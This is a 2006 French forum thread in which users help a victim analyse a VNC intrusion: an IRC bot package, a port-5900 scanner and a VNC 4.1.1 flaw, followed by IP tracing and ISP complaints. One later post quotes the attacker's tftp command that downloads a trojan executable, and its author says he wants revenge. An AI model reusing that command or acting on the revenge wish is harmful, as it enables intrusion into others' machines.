Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1290 connectés 

 


 Mot :   Pseudo :  
 
 Page :   1  2  3
Auteur Sujet :

Intrusion (via VNC ?)

n°2426799
Alana
Amiga for ever.
Posté le 02-06-2006 à 15:07:01  profilanswer
 

Reprise du message précédent :
Mouhahahahahahahhahaa trop fort :)
et effectivement c'est revenu. Tu viens de le ridiculiser mechament la.
En meme temps, c'est tellement enorme qu'on peut se demander si ce compte free a pas été hacké quand meme mais bon...
LOL.

mood
Publicité
Posté le 02-06-2006 à 15:07:01  profilanswer
 

n°2426801
LeRiton
Posté le 02-06-2006 à 15:09:32  profilanswer
 

Bin écoute, il a l'air de trainer sur beaucoup de chans orientés scripts, donc la coïncidence bofbof...

n°2426805
Alana
Amiga for ever.
Posté le 02-06-2006 à 15:14:07  profilanswer
 

ouai...

n°2426821
ShonGail
En phase de calmitude ...
Posté le 02-06-2006 à 15:25:22  profilanswer
 

LeRiton a écrit :

Bin en fait, le mail et le site, j'ai rien qui me dit qu'il en est le proprio (forte suscpition - l'orthographe ?). Son IP je l'ai pas pour le moment, je cherchai des logs VNC (apparament dans le journal d'évenement, je regarde ce soir).
 
Donc j'ai pas granbd chose pour le moment  :D


 
Un site sur mirc et ton pirate tente d'installer mirc ?
Un site Free et une IP free sur cachan ?
 
Ca fait de sacrées coincidences !
 
maintenant recoupe ce soir avec tes logs vnc ...


Message édité par ShonGail le 02-06-2006 à 15:26:09
n°2426830
LeRiton
Posté le 02-06-2006 à 15:30:26  profilanswer
 

Tu pourrais m'envoyer en MP l'IP contenue dans le script ? Ca peut me servir pour les recoupages !
 

n°2426842
ShonGail
En phase de calmitude ...
Posté le 02-06-2006 à 15:36:34  profilanswer
 

tu la trouveras dans l'archive, fichier var.ini
 
Y'a d'autres infos mais ne connaissant pas du tout le chat IRC et mirc, je te laisse te renseigner.

n°2426900
Quich'Man
No Fat...
Posté le 02-06-2006 à 16:30:58  profilanswer
 

L'ip 82.xx.xx.xx n'appartient pas au hacker (ou alors il est vraiment grave  :lol: ), c'est plutot un serveur hacké sur lequel il y a un serveur irc pirate (certainement installé à l'insu de proprio).
J'y connais pas grd chose en IRC non plus mais j'ai l'impression que le mec essayait d'installer un bot irc sur ta machine surement pour faire du xdcc, également son paquet contenait un scanner de port configuré pour scanner uniquement sur le 5900 (donc pour trouver d'autres serveurs VNC).  
 
Un moyen simple pour ne plus te faire avoir c'est de changer le port d'ecoute de VNC, on voit clairement que son scanner ne recherche que sur ce port là :)
 
D'autre part, tu peux aller sur son channel irc, y'a toutes les infos de connetion dans le fichier var.ini (destiné normalement a la connection du bot).
 
Apparemment y'a rien de méchant dans son package, pas de backdoor, pas de rootkit donc si tu résouds ton prob vnc, il pourra pas revenir ;)
 
Sinon ne t'inquiete pas, le brute force sur VNC c'est presque impossible. Tout ce qui est possible c'est d'extraire la clé du registre qui contient l'hexa du pass et de le décrypter mais pour ca il faut deja avoir un accès root sur la machine.  :hello:


Message édité par Quich'Man le 02-06-2006 à 16:38:04
n°2426925
LeRiton
Posté le 02-06-2006 à 16:49:43  profilanswer
 

Merci pour toutes ces précisions.
 
Je viens de vérifier ma version qui est bien la 4.1.1. Nous avons notre réponse !
 
Reste à attendre que le sieur se connecte à MSN pour lui expliquer ma vision des choses.
 
Un grand merci à tous pour la solution de ce problème en une journée !
 
Je vous tiens au courant de cet entretien qui risque d'être fort drole  :D

n°2426928
Tuxerman12
Posté le 02-06-2006 à 16:52:00  profilanswer
 

Ils ont pas assuré sur ce coup là chez VNC , sortir une version avec une telle faille de sécurité :pfff:

n°2426930
LeRiton
Posté le 02-06-2006 à 16:55:11  profilanswer
 

Bon, des news du journal d'évenement.
 
Effectivement, un paquet de déco / reco sur VNC, à des heures où je ne m'en suit jamais servi. L'antivirus ne trouve rien, j'en déduis que c'était la première intrusion du gars. Si vous voyez d'autres choses à controller sur mon poste, n'hésitez pas à me conseiller.

mood
Publicité
Posté le 02-06-2006 à 16:55:11  profilanswer
 

n°2426932
ShonGail
En phase de calmitude ...
Posté le 02-06-2006 à 16:56:10  profilanswer
 

ben voui : c'est quoi l'ip qui s'est connectée ? La même que celle dont je t'ai causée ?

n°2426933
Quich'Man
No Fat...
Posté le 02-06-2006 à 16:57:21  profilanswer
 

LeRiton a écrit :

Bon, des news du journal d'évenement.
 
Effectivement, un paquet de déco / reco sur VNC, à des heures où je ne m'en suit jamais servi. L'antivirus ne trouve rien, j'en déduis que c'était la première intrusion du gars. Si vous voyez d'autres choses à controller sur mon poste, n'hésitez pas à me conseiller.


 
 
tu as pas l'ip du gars ?  :whistle:  
 
Verifie dans les process que son restore.exe ne soit pas lancé.  :hello:

n°2426938
LeRiton
Posté le 02-06-2006 à 17:08:30  profilanswer
 

Oui, j'ai l'IP du gars  :D  
 
Chez Free, comme prévu. Et il est bien sur Cachan.
 
Par contre, son IP renvoie sur un site de stats de salon IRC dont je tairais le nom.
 
Restore n'est pas lancé, il n'avait pas eu le temps d'executer son script de toute manière.

n°2426947
vrobaina
Hecho a Mano
Posté le 02-06-2006 à 17:22:57  profilanswer
 

je trouve qd meme etonnant qu'un type capable d'exploiter la "faille VNC", se fasse avoir avec son IP. :heink:
 
A mon avis le site web en question a été piraté et sert maintenant pour le download de saloperie.
(J'en ai fait l'amère expérience en novembre dernier avec la faille sur awstat.......)
 


Message édité par vrobaina le 02-06-2006 à 17:25:05
n°2426949
LeRiton
Posté le 02-06-2006 à 17:24:35  profilanswer
 

D'un autre coté, si je l'avais pas choppé pile pendant la manip', il aurait peut être effacé les traces de son passage.
 
Et rien ne me dit que c'est son IP, même si j'ai de fortes présomptions.

n°2426958
Tuxerman12
Posté le 02-06-2006 à 17:35:56  profilanswer
 

Une machine avec un serveur http dessus , je pense que c'est la sienne , peu de chances que ce soit un zombie :D


Message édité par Tuxerman12 le 02-06-2006 à 17:36:44
n°2426970
vrobaina
Hecho a Mano
Posté le 02-06-2006 à 17:47:01  profilanswer
 

pas une zombie, juste une machine hackée sur laquel le "pirate en herbe" a déposé un fichier qu'il s'amuse ensuite à downloader à partir des clients VNC qu'il hack.
 
=> on remonte vite à au serveur web, mais pas possible de remonter facilement au hackeur....


Message édité par vrobaina le 02-06-2006 à 17:47:33
n°2427007
Quich'Man
No Fat...
Posté le 02-06-2006 à 18:19:17  profilanswer
 

tu devrais te connecter au serveur IRC, entrer sur le channel ciblé dans le ini et discuter avec un admin du serveur IRC. J'y suis là sur le channel, y'a un admin et plusieurs bots, surement des machines hackées aussi  :fou:
 
Je viens de discuter avec l'admin du serveur, (il etait lui meme infecté comme quoi...). Sinon il a fermé le channel et a viré tous les bots. Apparement le "hacker" a deja filé, il etait pas sur le channel.

Message cité 1 fois
Message édité par Quich'Man le 02-06-2006 à 19:12:37
n°2427137
LeRiton
Posté le 02-06-2006 à 20:50:16  profilanswer
 

Bon, bin je viens de finir avec lui.
 
Comme je supposais, rien de constructif. Je débute poliement en lui demandant si il est pas venu faire un tour chez moi hier soir. Points de suspention, il me demande comment je sais que c'est lui.
là, j'avoue que je lui ai dis qu'il avait pas été très discret, et je lui demande gentiment de m'oublier. Il m'envoi chier, je lui poste les infos (IP et urls). "C'est bien, tu va faire quoi, tu va appeller la police ?" et il se déco.
 
C'est beau la jeunesse. Je garde tout sous le coude, si j'ai des soucis par la suite, il prendra pour les autres dans le doute.
 
Quand même minable d'en arriver là...

n°2427146
ShonGail
En phase de calmitude ...
Posté le 02-06-2006 à 20:53:23  profilanswer
 

J'ai une question :
 
ou as-tu un log des connections avec RealVNC ? J'ai ressorti ce prog des oubliettes mais je n'ai trouvé nul part un quelconque enregistrement des connexions ou tentatives :/
 
Sinon :
 
tu serais effectivement en droit de porter plainte. Il a commis un délit.

n°2427149
LeRiton
Posté le 02-06-2006 à 20:54:21  profilanswer
 

Les logs sont pas dans VNC, mais on voit les connexions par le journal d'évenement Windows.

n°2427152
ShonGail
En phase de calmitude ...
Posté le 02-06-2006 à 20:55:33  profilanswer
 

??
pourtant j'ai regardé ! je remate ...

n°2427159
LeRiton
Posté le 02-06-2006 à 20:59:42  profilanswer
 

Quich'Man a écrit :

Je viens de discuter avec l'admin du serveur, (il etait lui meme infecté comme quoi...). Sinon il a fermé le channel et a viré tous les bots. Apparement le "hacker" a deja filé, il etait pas sur le channel.


 
Si il a besoin des infos sur le gars en question, qu'il me PM. La gars a confirmé que c'était lui (avant de m'envoyer bouler  :o ).

n°2427162
ShonGail
En phase de calmitude ...
Posté le 02-06-2006 à 21:00:58  profilanswer
 

ShonGail a écrit :

??
pourtant j'ai regardé ! je remate ...


 
 
ok effectivement SI le serveur est lancé en tant que service ... :/

n°2427202
LeRiton
Posté le 02-06-2006 à 21:48:21  profilanswer
 

Bon, cette histoire (et la conversation) m'ont pas mal énervé.
 
Je suis pas trop pour la dénonciation, mais j'aimerai garder une porte de secours si il recommence.
 
Que me conseillez vous, sachant que je vois d'ici l'intéret (nul) que portera Free à mon égard si je ne veut pas porter plainte.
 
Je me dis que si je me réveille dans 1 mois, Free ne pourra plus prouver la fraude (ils gardent pas leurs log 107 ans j'imagine).

n°2427219
ShonGail
En phase de calmitude ...
Posté le 02-06-2006 à 22:07:33  profilanswer
 

Ben tu fais comme tu veux.
 
Le gars il essaye d'entrer chez toi et pris sur le fait il t'envoie chier alors si tu veux tendre la fesse gauche ;)
 
En deça de la plainte auprès de la police (qui est effectivement un peu fort :D ), tu peux contacter son FAI pour signaler qu'il s'est connecté à ton ordi après l'utilisation d'un exploit. I devrait lui notifier par mail qu'à la prochaine plainte, il verra son abonnement résilié.

n°2427294
gen2
Posté le 03-06-2006 à 00:11:05  profilanswer
 

Ca me paraît être la meilleure solution.
 
Porter plainte pour un truc comme ça où au final, il n'y a pas de dommages (enfin j'espère), je pense que ça ne donnera pas grand chose.
Par contre, en effet, s'ils sont un minimum sérieux chez Free (surtout que LeRiton est client aussi), ils devraient balancer un avertissement à ce type.

n°2427344
Quich'Man
No Fat...
Posté le 03-06-2006 à 09:31:48  profilanswer
 

Oui moi je me plaindrais a Free pour qu'il ait un avertissement. Il joue au con, il aurait au moins pu s'excuser.
 
Sinon LeRiton je te file en pm les coordonnées de l'admin du serveur IRC.

n°2427346
Tuxerman12
Posté le 03-06-2006 à 09:33:12  profilanswer
 

LeRiton a écrit :

Bon, cette histoire (et la conversation) m'ont pas mal énervé.
 
Je suis pas trop pour la dénonciation, mais j'aimerai garder une porte de secours si il recommence.
 
Que me conseillez vous, sachant que je vois d'ici l'intéret (nul) que portera Free à mon égard si je ne veut pas porter plainte.
 
Je me dis que si je me réveille dans 1 mois, Free ne pourra plus prouver la fraude (ils gardent pas leurs log 107 ans j'imagine).


 
 
Les FAI ne gardent aucun log des activités de leurs clients sur internet , uniquement les heures de connexions et les ips attribuées (en ip fixe c'est pas compliqué) , si tu veux (essayer de) faire valloir tes droits à ne pas te faire hacker , tu dois écrire un mail explicite accompagné de preuves (logs) au service abuse du FAI du hacker . Vu que c'est un client de Free , l'adresse du service est  abuse@proxad.net si je me trompe pas .


Message édité par Tuxerman12 le 03-06-2006 à 09:40:39
n°2428403
Alana
Amiga for ever.
Posté le 04-06-2006 à 22:29:10  profilanswer
 

Quel petit con ! Je suppose que tu a logué la conversation que tu as eu avec lui, donc si il a reconu que c'etait bien lui, niveau preuve (en plus de tout le reste) ca le fait pas mal. Donc perso je sais que vu sa reaction je ferai la totale, plainet au FAI plus depot d'une plainte au poste de police, on a pas le droit d'etre aussi con.

n°2429105
LeRiton
Posté le 05-06-2006 à 18:11:02  profilanswer
 

Bon, pour clore le sujet, pas de plainte pour le moment, je verrais demain pour Free.
 
Merci à tous ceux qui m'ont aidé à résoudre le problème si rapidement, je pense que du même coup, il a eu une belle frayeur (encore dans le doute même) et qu'il hésitera avant de recommencer.
 
Merci à tous !

n°2432407
ckilla
Posté le 09-06-2006 à 01:13:05  profilanswer
 

Bonsoir,
 
Idem pour moi. J'étais tranquille devant mon PC quand la souris c'est mise à bouger...
Direct un oeil sur VNC et l'icone était actif.
 
Donc un petit netstat pour voir les connexions sur ma machine puis après un petit tour dans les logs et là.........grosse stupeur.
J'ai des centaines de connexions réussis :( à VNC
 
Je n'ose pas imaginer l'état de mon PC :| certaines connexions ont 2 mois :(
 
Je vais contacter le provider du dernier avec preuve à l'appuie (screenshot et logs)
 
Mais VNC fini pour moi. Welcome SSH.

n°2515040
fievel
Posté le 11-09-2006 à 18:17:16  profilanswer
 

:hello:
 
Même problème sur le PC du taf et chez ma copine :o :fou:

n°2523260
sammo
Legen..(wait for it)...dary !
Posté le 19-09-2006 à 22:15:16  profilanswer
 

Bonsoir, un ami vous demande :
 
 
Bonsoir,
 
Même problème sur les 2 ordis de mes grands parents, execution (téléchargement plutot) de fichiers sur le même site, mais cette fois c'était "slss.exe"...
 
Suis arrivé à temps (vive mles grands parents qui m'appellent à c emoment là ^^), tout coupé à distance, et je viens de mailer abuse@proxad.net pour ce problème.
 
A mon avis c'est bien le détenteur de ce compte, ça fait trop de coïncidence :/
 
VNC mis à jour à la 4.12, je vais m'occuper du cas de ce mec... vais porter plainte contre son IP, violation de propriété privée (même si c'est qu'un ordi) + atteinte à ala vie privée en balançant des injures sur le MSN...
 
Si vous organisez une action commune, pouvez-vous me contacter via msn pour m'en informer : usarmy_canard_wc[at]msn.com
 
Merci ;)

n°2523305
Code-47
Posté le 19-09-2006 à 23:12:27  profilanswer
 

Bonsoir, je suis la personne qui a fait poster le précédent message ;)
 
J'ai tracé l'IP dans l'event viewer de windaube, et suis tombé sur un NRA à REIMS, donc pas de cachan cette fois. (IP : 86.208.199.XX chez Wanadoo)
 
Après contact sur MSn de ce "Mengde", il en ressort que c'est un petit couillon qui s'amuse et se croit malin, tout ce que j'ai pu en tirer c'était du "j'en ai rien à foutre" (en résumant)...
 
:/

n°2523361
LeRiton
Posté le 20-09-2006 à 00:05:02  profilanswer
 

Je repasse par là.
 
J'avais eu le même son de cloche à l'époque. Plus de nouvelles après, je suis passé à autre chose...

n°2523898
cdg_info
Posté le 20-09-2006 à 15:52:29  profilanswer
 

Salut,
 
Le même problème chez trois client différents : Paris, Lyon et Chassieu

n°2523992
Badze
Aime les frites
Posté le 20-09-2006 à 17:26:01  profilanswer
 

Tu peux choper l'adresse du gars dans les logs de Windows il me semble, un collegue à eu se problème et il me semblait bien que l'adresse était indiqué.
 
Ce qui est sur est que tu as des traces dans les logs Windows

n°2524005
Pnar
Posté le 20-09-2006 à 17:39:50  profilanswer
 

je découvre cette faille ...
drapal


---------------
le progrès ne vaut que s'il est partagé par tous
n°2530542
humanum
Posté le 27-09-2006 à 23:02:47  profilanswer
 

Bonjour,
Même aventure mais avec un autre mode opératoire:
il exécute dos via la commande %systemroot%\system32\cmd.exe
(J’ai appris un raccourci là) lol
ensuite il tape tftp -i 0.0.0.0 get winlolx.exe
 
Comme c'est la 3 ème fois j'ai pris le temps de regarder mais quand j'ai vu que c'était via VNC (icone verdi) je lui ai coupé la chique, j'ai craqué, pourtant ma machine ne craint rien et je formaterai quand j'aurais compris comment tout cela marche.  
 
Apres ma première attaque (sans savoir si VNC était en cause) j'avais tout scané et trouvé 2 trojan + un icon avec un programme appelé ddos.exe
Par la suite je coupais tous les services apres lancement (VNC, Filezilla serveur etc...)
Je n'ai donc pas eu de souci sauf hier et sans VNC j'en suis sur et trois fois aujourd'hui juste apres mon scan total.
 
Le mode opératoire est le même : exécute : %systemroot%\system32\cmd.exe puis lancement d'un exe précédé de tftp (tentative avec 2 winlolx.exe et un autre dont je n'ai pu noter le nom)
 
Tout cela est incohérent comment peut il avec ou sans VNC? Est-ce le nouveau contact mystère dans MSN d'hier mais qui ne répond pas? Est-ce un hack via msn ?
Je sais simplement que winlolx.exe = Malware.Trojan.Backdoor.Gen Spyware
Que mon ad aware ne l'a pas vu et que je devrai utiliser Ewido comme anti Spyware et Anti Malware. (merci Steve)
 
 
Ma question donc n'est pas comment nettoyer ma machine, mais comprendre comment il a fait, trouver son ip, tenter la même chose, VANGEANCE!. Et puis je ne vais pas formater mon disque et refaire les mêmes erreurs.
 
Bon je dois pas beaucoup aider, et exposer un nouveau problème, mais Leriton voulait savoir s'il était seul dans se cas.... ben non....
 
@+ merci à tous
Humanum

n°2530565
humanum
Posté le 27-09-2006 à 23:25:06  profilanswer
 

Badze a écrit :

Tu peux choper l'adresse du gars dans les logs de Windows il me semble, un collegue à eu se problème et il me semblait bien que l'adresse était indiqué.
 
Ce qui est sur est que tu as des traces dans les logs Windows


 
 
comment et ou son les log?
merci d'avance

mood
Publicité
Posté le   profilanswer
 

 Page :   1  2  3

Aller à :
Ajouter une réponse
 

Sujets relatifs
VNCUn p'tit coup de main avec VNC
VNC sur MAC ! Est ce possible ?Plus imple que VNC si cela existe
Petit défi : VNC + double tunneling SSH et HTTPavoir du son avec VNC
[VNC] connaitre l'adresse IPVNC et routeur ...
Log anti intrusion...VNC Admin Console
Plus de sujets relatifs à : Intrusion (via VNC ?)


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR